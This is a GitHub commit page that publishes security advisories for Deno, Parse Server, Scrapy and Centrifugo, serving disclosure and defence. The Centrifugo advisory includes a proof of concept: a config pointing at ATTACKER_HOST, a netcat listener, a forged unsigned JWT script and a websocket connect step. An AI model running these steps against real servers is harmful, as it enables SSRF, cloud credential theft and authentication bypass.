Skip to content

Commit fc1cbe2

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-4c96-w8v2-p28j GHSA-69xg-f649-w5g2 GHSA-cwxj-rr6w-m6w7 GHSA-j77h-rr39-c552 GHSA-x2hw-px52-wp4m
1 parent fd36f11 commit fc1cbe2

5 files changed

Lines changed: 386 additions & 0 deletions

File tree

advisories/github-reviewed/2026/03/GHSA-4c96-w8v2-p28j/GHSA-4c96-w8v2-p28j.json

Lines changed: 61 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,61 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-4c96-w8v2-p28j",
4+
"modified": "2026-03-13T20:02:18Z",
5+
"published": "2026-03-13T20:02:18Z",
6+
"aliases": [
7+
"CVE-2026-32260"
8+
],
9+
"summary": "Deno vulnerable to command Injection via incomplete shell metacharacter blocklist in node:child_process",
10+
"details": "## Summary\n\n A command injection vulnerability exists in Deno's `node:child_process` polyfill (`shell: true` mode) that bypasses the fix\n for CVE-2026-27190 (GHSA-hmh4-3xvx-q5hr). An attacker who controls arguments passed to `spawnSync` or `spawn` with `shell:\n true` can execute arbitrary OS commands, bypassing Deno's permission system.\n\n **Affected versions:** Deno v2.7.0, v2.7.1\n\n ## Details\n\n The two-stage argument sanitization in `transformDenoShellCommand` (`ext/node/polyfills/internal/child_process.ts`) has a\n priority bug: when an argument contains a `$VAR` pattern, it is wrapped in double quotes (L1290) instead of single quotes\n (L1293). Double quotes in POSIX sh do not suppress backtick command substitution, allowing injected commands to execute.\n\n Attack chain:\n 1. `escapeShellArg` wraps the argument in single quotes (safe)\n 2. `op_node_parse_shell_args` strips the single-quote delimiters during tokenization (raw argument exposed)\n 3. Re-quoting detects `$VAR` pattern → applies double quotes\n 4. Backtick payload inside double quotes executes via `/bin/sh`\n\n ## Impact\n\n **OS Command Injection (CWE-78)**. Any application using `node:child_process` `spawn`/`spawnSync` with `shell: true` and\n user-controlled arguments is vulnerable. Injected commands execute at the OS process level, outside Deno's permission\n sandbox. Only `--allow-run` is required.\n\n ## Mitigation\n\n Avoid passing user-controlled input as arguments to `spawn`/`spawnSync` with `shell: true`. Use `shell: false` (the default)\n instead, or validate/sanitize inputs before passing them.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "crates.io",
21+
"name": "deno"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "2.7.0"
29+
},
30+
{
31+
"fixed": "2.7.2"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/denoland/deno/security/advisories/GHSA-4c96-w8v2-p28j"
42+
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32260"
46+
},
47+
{
48+
"type": "PACKAGE",
49+
"url": "https://github.com/denoland/deno"
50+
}
51+
],
52+
"database_specific": {
53+
"cwe_ids": [
54+
"CWE-78"
55+
],
56+
"severity": "HIGH",
57+
"github_reviewed": true,
58+
"github_reviewed_at": "2026-03-13T20:02:18Z",
59+
"nvd_published_at": "2026-03-12T20:16:06Z"
60+
}
61+
}

advisories/github-reviewed/2026/03/GHSA-69xg-f649-w5g2/GHSA-69xg-f649-w5g2.json

Lines changed: 88 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,88 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-69xg-f649-w5g2",
4+
"modified": "2026-03-13T20:02:25Z",
5+
"published": "2026-03-13T20:02:25Z",
6+
"aliases": [
7+
"CVE-2026-32269"
8+
],
9+
"summary": "Parse Server OAuth2 adapter app ID validation sends wrong token to introspection endpoint",
10+
"details": "### Impact\n\nThe OAuth2 authentication adapter does not correctly validate app IDs when `appidField` and `appIds` are configured. During app ID validation, a malformed value is sent to the token introspection endpoint instead of the user's actual access token. Depending on the introspection endpoint's behavior, this could either cause all OAuth2 logins to fail, or allow authentication from disallowed app contexts if the endpoint returns valid-looking data for the malformed request.\n\nDeployments using the OAuth2 adapter with `appidField` and `appIds` configured are affected.\n\n### Patches\n\nThe fix corrects the parameter alignment in the OAuth2 adapter's app ID validation method to match the expected interface, ensuring the correct access token is sent to the introspection endpoint.\n\n### Workarounds\n\nThere is no known workaround.\n\n### References\n\n- GitHub security advisory: https://github.com/parse-community/parse-server/security/advisories/GHSA-69xg-f649-w5g2\n- Fix in Parse Server 9: https://github.com/parse-community/parse-server/releases/tag/9.6.0-alpha.13\n- Fix in Parse Server 8: https://github.com/parse-community/parse-server/releases/tag/8.6.39",
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "npm",
21+
"name": "parse-server"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "9.0.0"
29+
},
30+
{
31+
"fixed": "9.6.0-alpha.13"
32+
}
33+
]
34+
}
35+
]
36+
},
37+
{
38+
"package": {
39+
"ecosystem": "npm",
40+
"name": "parse-server"
41+
},
42+
"ranges": [
43+
{
44+
"type": "ECOSYSTEM",
45+
"events": [
46+
{
47+
"introduced": "8.0.2"
48+
},
49+
{
50+
"fixed": "8.6.39"
51+
}
52+
]
53+
}
54+
]
55+
}
56+
],
57+
"references": [
58+
{
59+
"type": "WEB",
60+
"url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-69xg-f649-w5g2"
61+
},
62+
{
63+
"type": "ADVISORY",
64+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32269"
65+
},
66+
{
67+
"type": "PACKAGE",
68+
"url": "https://github.com/parse-community/parse-server"
69+
},
70+
{
71+
"type": "WEB",
72+
"url": "https://github.com/parse-community/parse-server/releases/tag/8.6.39"
73+
},
74+
{
75+
"type": "WEB",
76+
"url": "https://github.com/parse-community/parse-server/releases/tag/9.6.0-alpha.13"
77+
}
78+
],
79+
"database_specific": {
80+
"cwe_ids": [
81+
"CWE-683"
82+
],
83+
"severity": "MODERATE",
84+
"github_reviewed": true,
85+
"github_reviewed_at": "2026-03-13T20:02:25Z",
86+
"nvd_published_at": "2026-03-12T20:16:06Z"
87+
}
88+
}

advisories/github-reviewed/2026/03/GHSA-cwxj-rr6w-m6w7/GHSA-cwxj-rr6w-m6w7.json

Lines changed: 62 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,62 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-cwxj-rr6w-m6w7",
4+
"modified": "2026-03-13T20:02:36Z",
5+
"published": "2026-03-13T20:02:36Z",
6+
"aliases": [],
7+
"summary": "Scrapy: Arbitrary Module Import via Referrer-Policy Header in RefererMiddleware",
8+
"details": "### Impact\n\nSince version 1.4.0, Scrapy respects the `Referrer-Policy` response header to decide whether and how to set a `Referer` header on follow-up requests.\n\nIf the header value looked like a valid Python import path, Scrapy would import the referenced object and call it, assuming it referred to a referrer policy class (for example, `scrapy.spidermiddlewares.referer.DefaultReferrerPolicy`) and attempting to instantiate it to handle the `Referer` header.\n\nA malicious site could exploit this by setting `Referrer-Policy` to a path such as `sys.exit`, causing Scrapy to import and execute it and potentially terminate the process.\n\n### Patches\n\nUpgrade to Scrapy 2.14.2 (or later).\n\n### Workarounds\n\nIf you cannot upgrade to Scrapy 2.14.2, consider the following mitigations.\n\n- **Disable the middleware:** If you don't need the `Referer` header on follow-up requests, set [`REFERER_ENABLED`](https://docs.scrapy.org/en/latest/topics/spider-middleware.html#referer-enabled) to `False`.\n- **Set headers manually:** If you do need a `Referer`, disable the middleware and set the header explicitly on the requests that require it.\n- **Set `referrer_policy` in request metadata:** If disabling the middleware is not viable, set the [`referrer_policy`](https://docs.scrapy.org/en/latest/topics/spider-middleware.html#referrer-policy) request meta key on all requests to prevent evaluating preceding responses' `Referrer-Policy`. For example:\n\n```python\nRequest(\n url,\n meta={\n \"referrer_policy\": \"scrapy.spidermiddlewares.referer.DefaultReferrerPolicy\",\n },\n)\n```\n\nInstead of editing requests individually, you can:\n\n- implement a custom [spider middleware](https://docs.scrapy.org/en/latest/topics/spider-middleware.html) that runs before the built-in referrer policy middleware and sets the `referrer_policy` meta key; or\n- set the meta key in start requests and use the [scrapy-sticky-meta-params](https://github.com/heylouiz/scrapy-sticky-meta-params) plugin to propagate it to follow-up requests.\n\nIf you want to continue respecting legitimate `Referrer-Policy` headers while protecting against malicious ones, disable the built-in referrer policy middleware by setting it to `None` in [`SPIDER_MIDDLEWARES`](https://docs.scrapy.org/en/latest/topics/settings.html#std-setting-SPIDER_MIDDLEWARES) and replace it with the fixed implementation from Scrapy 2.14.2.\n\nIf the Scrapy 2.14.2 implementation is incompatible with your project (for example, because your Scrapy version is older), copy the corresponding middleware from your Scrapy version, apply the same patch, and use that as a replacement.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V3",
12+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "PyPI",
19+
"name": "Scrapy"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "1.4.0"
27+
},
28+
{
29+
"fixed": "2.14.2"
30+
}
31+
]
32+
}
33+
],
34+
"database_specific": {
35+
"last_known_affected_version_range": "<= 2.14.1"
36+
}
37+
}
38+
],
39+
"references": [
40+
{
41+
"type": "WEB",
42+
"url": "https://github.com/scrapy/scrapy/security/advisories/GHSA-cwxj-rr6w-m6w7"
43+
},
44+
{
45+
"type": "WEB",
46+
"url": "https://github.com/scrapy/scrapy/commit/945b787a263586cb5803c01c6da57daad8997ae5"
47+
},
48+
{
49+
"type": "PACKAGE",
50+
"url": "https://github.com/scrapy/scrapy"
51+
}
52+
],
53+
"database_specific": {
54+
"cwe_ids": [
55+
"CWE-470"
56+
],
57+
"severity": "HIGH",
58+
"github_reviewed": true,
59+
"github_reviewed_at": "2026-03-13T20:02:36Z",
60+
"nvd_published_at": null
61+
}
62+
}

advisories/github-reviewed/2026/03/GHSA-j77h-rr39-c552/GHSA-j77h-rr39-c552.json

Lines changed: 60 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,60 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-j77h-rr39-c552",
4+
"modified": "2026-03-13T20:03:22Z",
5+
"published": "2026-03-13T20:03:22Z",
6+
"aliases": [
7+
"CVE-2026-32301"
8+
],
9+
"summary": "Centrifugo: SSRF via unverified JWT claims interpolated into dynamic JWKS endpoint URL",
10+
"details": "### Summary\nCentrifugo is vulnerable to Server-Side Request Forgery (SSRF) when configured with a dynamic JWKS endpoint URL using template variables (e.g. `{{tenant}}`). An unauthenticated attacker can craft a JWT with a malicious `iss` or `aud` claim value that gets interpolated into the JWKS fetch URL **before the token signature is verified**, causing Centrifugo to make an outbound HTTP request to an attacker-controlled destination.\n\n### Details\nIn `internal/jwtverify/token_verifier_jwt.go`, the functions `VerifyConnectToken` and `VerifySubscribeToken` follow this flawed order of operations:\n1. Token is parsed without verification: `jwt.ParseNoVerify([]byte(t))`\n2. Claims are decoded from the unverified token\n3. `validateClaims()` runs — extracting named regex capture groups from \n `issuer_regex`/`audience_regex` into `tokenVars` map using attacker-controlled \n `iss`/`aud` claim values\n4. `verifySignatureByJWK(token, tokenVars)` is called — passing attacker-controlled \n `tokenVars` to the JWKS manager\n5. In `internal/jwks/manager.go`, `fetchKey()` interpolates `tokenVars` directly \n into the JWKS URL:\n `jwkURL := m.url.ExecuteString(tokenVars)`\n6. Centrifugo makes an HTTP GET request to the attacker-controlled URL\n\nSuppressed the security linter on this line with an incorrect comment:\n`//nolint:gosec // URL is from server configuration, not user input.`\nThe URL is NOT purely from server configuration — it is partially constructed from unverified user-supplied JWT claims.\n\nSignature verification happens too late — after the SSRF has already fired.\n\n### PoC\n**Required config** (`config.json`):\n```json\n{\n \"client\": {\n \"token\": {\n \"jwks_public_endpoint\": \"http://ATTACKER_HOST:8888/{{tenant}}/.well-known/jwks.json\",\n \"issuer_regex\": \"^(?P[a-zA-Z0-9_-]+)\\\\.auth\\\\.example\\\\.com$\"\n }\n },\n \"http_api\": { \"key\": \"test-api-key\" }\n}\n```\n\n**Step 1** — Start listener on attacker machine:\n```\nnc -lvnp 8888\n```\n\n**Step 2** — Generate malicious unsigned JWT:\n```python\nimport base64, json\n\ndef b64url(data):\n return base64.urlsafe_b64encode(data).rstrip(b'=').decode()\n\nheader = b'{\"alg\":\"RS256\",\"kid\":\"test-kid\",\"typ\":\"JWT\"}'\npayload = b'{\"sub\":\"attacker\",\"iss\":\"evil-tenant.auth.example.com\",\"exp\":9999999999}'\ntoken = f\"{b64url(header)}.{b64url(payload)}.fakesig\"\nprint(token)\n```\n\n**Step 3** — Connect to Centrifugo WebSocket with the malicious token:\n```python\nimport websocket, json\nws = websocket.create_connection(\"ws://TARGET:8000/connection/websocket\")\nws.send(json.dumps({\"id\": 1, \"connect\": {\"token\": \"\"}}))\nprint(ws.recv())\n```\n\n**Step 4** — Observe incoming HTTP request on attacker listener:\n```\nGET /evil-tenant/.well-known/jwks.json HTTP/1.1\nHost: ATTACKER_HOST:8888\nUser-Agent: Go-http-client/1.1\n```\n\nMalicious token being crafted with suppress_origin=True bypassing the 403, and the token sent to Centrifugo:\n![1](https://github.com/user-attachments/assets/6fd5d5b8-f47a-4899-94db-931f52504808)\n\nCentrifugo Server Log:\n![2](https://github.com/user-attachments/assets/2e802648-8dc9-40d7-ac9e-f5f2ca19acad)\n\nnetcat terminal:\n![3](https://github.com/user-attachments/assets/854cfb19-ed0c-44e2-977a-efe2f9b6c50a)\n\n### Impact\n- **Unauthenticated SSRF** — No valid credentials required\n- Attacker can probe and access internal network services not exposed externally\n- On cloud deployments: access to metadata endpoints (AWS: `169.254.169.254`, GCP: `metadata.google.internal`) to steal IAM credentials\n- Attacker can serve a malicious JWKS response containing their own public key, causing Centrifugo to accept attacker-signed tokens as legitimate — leading to **full authentication bypass**\n- Exploitation requires `jwks_public_endpoint` to contain `{{...}}` template variables combined with `issuer_regex` or `audience_regex` — a configuration pattern explicitly documented and promoted by Centrifugo\n \n### Suggested Fix\n\n**1. Verify signature BEFORE extracting tokenVars (critical fix):**\nIn `token_verifier_jwt.go`, swap the order of operations:\n```go\n// CURRENT (vulnerable) order:\n// 1. ParseNoVerify\n// 2. validateClaims() → populates tokenVars from unverified claims\n// 3. verifySignature(token, tokenVars) ← too late\n\n// FIXED order:\n// 1. ParseNoVerify\n// 2. verifySignature(token) ← verify first with empty/nil tokenVars\n// 3. validateClaims() → only now extract tokenVars from verified claims\n// 4. If JWKS needed, re-verify with tokenVars using verified kid only\n```\n\n**2. Fix the incorrect nolint comment in `manager.go`:**\nRemove `//nolint:gosec // URL is from server configuration, not user input` The URL IS partially constructed from user input via JWT claims.\n\n**3. Alternative mitigation:**\nRestrict template variables to only the `kid` header field (which is not claim data) rather than allowing arbitrary claim values to influence the JWKS URL.\n```",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/centrifugal/centrifugo/v6"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "6.7.0"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 6.6.2"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/centrifugal/centrifugo/security/advisories/GHSA-j77h-rr39-c552"
45+
},
46+
{
47+
"type": "PACKAGE",
48+
"url": "https://github.com/centrifugal/centrifugo"
49+
}
50+
],
51+
"database_specific": {
52+
"cwe_ids": [
53+
"CWE-918"
54+
],
55+
"severity": "CRITICAL",
56+
"github_reviewed": true,
57+
"github_reviewed_at": "2026-03-13T20:03:22Z",
58+
"nvd_published_at": null
59+
}
60+
}

0 commit comments

Comments
 (0)